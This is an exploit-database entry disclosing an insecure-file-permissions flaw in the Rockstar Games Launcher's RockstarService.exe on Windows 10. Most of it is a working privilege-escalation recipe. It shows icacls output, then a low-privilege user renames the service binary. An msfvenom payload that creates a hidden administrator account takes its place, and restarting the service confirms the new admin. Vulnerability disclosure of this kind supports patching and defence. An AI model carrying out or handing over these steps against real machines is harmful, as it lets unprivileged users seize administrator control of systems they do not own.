Rockstar Service Insecure File Permissions

2021.04.05
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: Rockstar Service - Insecure File Permissions # Date: 2020-04-02 # Exploit Author: George Tsimpidas # Software Link : https://socialclub.rockstargames.com/rockstar-games-launcher # Version Patch: 1.0.37.349 # Tested on: Microsoft Windows 10 Home 10.0.18362 N/A Build 18362 Vulnerability Description: RockstarService.exe suffers from an elevation of privileges vulnerability which can be used by an "Authenticated User" to modify the existing executable file of the service with a binary of his choice. The vulnerability exist due to weak set of permissions being granted to the "Authenticated Users Group" which grants the (M) Flag aka "Modify Privilege" #PoC D:\Launcher> icacls .\Launcher.exe .\Launcher.exe BUILTIN\Administrators:(I)(F) NT AUTHORITY\SYSTEM:(I)(F) NT AUTHORITY\Authenticated Users:(I)(M) BUILTIN\Users:(I)(RX) #1. Create low privileged user & Login to that user C:\>net user lowpriv Password123! /add C:\>net user lowpriv | findstr /i "Membership Name" | findstr /v "Full" User name lowpriv Local Group Memberships *Users Global Group memberships *None #2. Move the RockstarService.exe to a new name D:\Launcher> move RockstarService.exe RockstarService.exe.bk 1 file(s) moved. #3. Create malicious binary on kali linux with MSF msfvenom -f exe -p windows/exec CMD="net user placebo Password123! /add && net localgroup Administrators placebo /add" -o RockstarService.exe #4. Transfer created 'RockstarService.exe' to the Windows Host #5. Move the created 'RockstarService.exe' binary to the 'D:\Launcher' to replace the old one #6. Now start the Service Command : net start 'Rockstar Service' Now check out that the user has been registered to the system and added to the local group of Administrators C:\Users\lowpriv>net user placebo | findstr /i "Membership Name" | findstr /v "Full" User name placebo Local Group Memberships *Administrators *Users Global Group memberships *None


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top